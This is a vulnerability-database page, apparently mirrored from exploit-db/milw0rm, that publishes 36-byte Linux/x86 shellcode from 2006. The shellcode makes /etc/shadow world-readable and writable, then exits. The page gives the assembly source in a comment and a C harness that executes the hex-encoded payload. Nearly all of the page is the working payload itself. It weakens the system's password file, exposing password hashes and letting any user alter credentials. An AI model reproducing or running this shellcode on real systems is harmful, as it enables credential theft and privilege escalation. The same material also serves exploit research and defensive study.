Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (36 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056071 漏洞类型
发布时间 2006-11-17 更新时间 2006-11-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13350
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* By Kris Katterjohn 8/29/2006
 *
 * 36 byte shellcode to chmod("/etc/shadow", 0666) and exit for Linux/x86
 *
 * To remove exit(): Remove the last 5 bytes (0x6a - 0x80)
 *
 *
 *
 * section .text
 *
 *      global _start
 *
 * _start:
 *      xor edx, edx
 *
 *      push byte 15
 *      pop eax
 *      push edx
 *      push byte 0x77
 *      push word 0x6f64
 *      push 0x6168732f
 *      push 0x6374652f
 *      mov ebx, esp
 *      push word 0666Q
 *      pop ecx
 *      int 0x80
 *
 *      push byte 1
 *      pop eax
 *      int 0x80
 */

main()
{
       char shellcode[] =
               "\x31\xd2\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\x68"
               "\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68"
               "\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80";

       (*(void (*)()) shellcode)();
}

// milw0rm.com [2006-11-17]